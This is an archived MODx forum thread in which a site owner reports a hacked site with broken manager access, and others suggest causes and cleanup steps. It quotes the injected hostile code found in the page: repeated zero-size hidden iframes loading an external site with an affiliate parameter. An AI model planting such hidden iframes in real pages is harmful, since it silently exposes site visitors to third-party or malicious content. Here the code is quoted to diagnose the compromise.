We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 10076
    • 1,024 Posts
    a site i created http://www.peacock-ict.nl(not finished by owner) has no more manager accces !

    this is what I get on manager access:
    Warning: Cannot modify header information - headers already sent by (output started at /home/users/p/e/peacod/www/assets/cache/siteCache.idx.php:3969) in /home/users/p/e/peacod/www/manager/index.php on line 144
    
    Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/users/p/e/peacod/www/assets/cache/siteCache.idx.php:3969) in /home/users/p/e/peacod/www/manager/includes/config.inc.php on line 41
    
    And this is code I find in the page source which is NOT mine:

    <html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
    <html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
    <html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
    <html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>


    What is going on here??? I cant seem to find the source to this- Links to images are no longer there. Willin to give access codes to ftp,

    best, Frank.
      • 7231
      • 4,205 Posts
      I have seen report of this sort of thing before on hosting forums. It could be a server vulnerability rather than a MODx one. But I am noan expert.
        [font=Verdana]Shane Sponagle | [wiki] Snippet Call Anatomy | MODx Developer Blog | [nettuts] Working With a Content Management Framework: MODx

        Something is happening here, but you don&#39;t know what it is.
        Do you, Mr. Jones? - [bob dylan]
        • 33372
        • 1,611 Posts
        Very likely a server hack and not anything MODx-related. Which is a drag because you don’t know what else these hackers may have installed, so even if you get rid of what you find there may be more mischief elsewhere. The best course of action is to notify your host, change all of your passwords (Control Panel, MySQL, FTP, MODx, etc.), and delete everything and restore from a clean backup.

        It looks as if they’ve modified either your cache file, your MODx template, or index.php to add their own (broken) HTML.

        9 times out of ten this sort of thing will be due to either a server vulnerability or a compromised password, but make sure that you have the latest version of MODx and have set register_globals to OFF anyway.
          "Things are not what they appear to be; nor are they otherwise." - Buddha

          "Well, gee, Buddha - that wasn&#39;t very helpful..." - ZAP

          Useful MODx links: documentation | wiki | forum guidelines | bugs & requests | info you should include with your post | commercial support options
          • 27630
          • 0 Posts
          Hi
          I came here from google. Hope you don’t mind.
          My site was hacked yesterday. Same MO. I"m 100% confident that this a bot attack.
          In my case it infected WordPress and the Coppermine image gallery.

          Coppermine was DOA, not because the hack was malicious, but because it corrupted a file. In the case of WordPress I noticed that as pages were loading the status bar showed transfers from strange websites such as free20.com, bizsomething etc. Also, in IE (I use FF) the format was broken because the hacker’s code screwed up the way IE handles CSS.

          The good news - very easy to fix. If you don’t have the files backed up to your hard drive, transfer the infected files there and do a search and replace on all the files and all the folders. Replace the hack code with nothing at all.

          The bad news, while this pushed me upgrade Coppermine (I’m hesitant about wordpress due to the high degree i’ve customized it), is that I don’t know how the bastards got in.

          The real bad news is that your CMS app, MODx, is also vulnerable. Keep in mind that 99% of infected users won’t know they are infected unless the code corrupts a file and leaves the app inoperable.
            • 33372
            • 1,611 Posts
            @SleepingWolf: Hello and welcome! You’re free to come here from Google or anywhere else. We’re not an exclusive club here.

            I’m skeptical that this is an actual vulnerability in MODx, however. If it’s a bot attack, then it may make use of register_globals being left ON to do some sort of cross-site scripting (perhaps through a vulnerability in an RTE package or something like that), but MODx complains pretty loudly if you leave register_globals ON so people doing so really should be scolded. Without more info it’s pretty hard to know, however.

            Do you (or anyone else) have any more information on this hack in particular so that we can review it and see how it might affect MODx?
              "Things are not what they appear to be; nor are they otherwise." - Buddha

              "Well, gee, Buddha - that wasn&#39;t very helpful..." - ZAP

              Useful MODx links: documentation | wiki | forum guidelines | bugs & requests | info you should include with your post | commercial support options
              • 33372
              • 1,611 Posts
              Just a brief FYI: There are tons of new vulnerabilities for both Coppermine and WordPress at SecurityFocus, but nothing for MODx since the FileDownload snippet hack that was squashed a while back.
                "Things are not what they appear to be; nor are they otherwise." - Buddha

                "Well, gee, Buddha - that wasn&#39;t very helpful..." - ZAP

                Useful MODx links: documentation | wiki | forum guidelines | bugs & requests | info you should include with your post | commercial support options
                • 10076
                • 1,024 Posts
                I just got rid of it by replacing the siteCache.idx.php file with the backup. Must admit i forgot (uhps) to set registerglobals to of. The host did not react sofar, good news....
                For the rest I am not a techie in this matter.

                When loading the manager page the page kept reloading it self,with an indication that the formentioned file had an error.

                Cheers.
                  • 22303 MODX Staff
                  • 10,725 Posts
                  If this is truly a vulnerability in MODx (or possibly one of the add-ons you’ve chosen), your raw server logs should help reveal the source of it. Look around the time the "hack" occurred and try to find any suspicious looking requests to modx files (i.e. that include strange URLs in the parameters, etc.). Depending on what add-ons you’ve used in your MODx site, one of those could potentially have an as of yet unreported vulnerability, but otherwise, I am doubtful this breach had anything to do with MODx core code itself. However, I’d love to know if you do find anything suspicious; and if you do, we’d appreciate if you would send details via PM first so as not to reveal any potential attack vectors to the public.
                    • 33372
                    • 1,611 Posts
                    I seem to remember someone else having their cache file modified in a similar way by a hacker a long while back. i believe that they were running an old and unpatched version of MODx (0.9.0 I think), and that they also had register_globals set to ON. What version of MODx are you running on this server, and what other scripts do you have installed there?
                      "Things are not what they appear to be; nor are they otherwise." - Buddha

                      "Well, gee, Buddha - that wasn&#39;t very helpful..." - ZAP

                      Useful MODx links: documentation | wiki | forum guidelines | bugs & requests | info you should include with your post | commercial support options
                      • 10076
                      • 1,024 Posts
                      Modx 0.9.5, server logs not within my reach and the host is not responding so far..
                      As its a simpel page there are no scripts running. Owner is to busy to load the site with content.

                      www.peacock-ict.nl

                      Frank.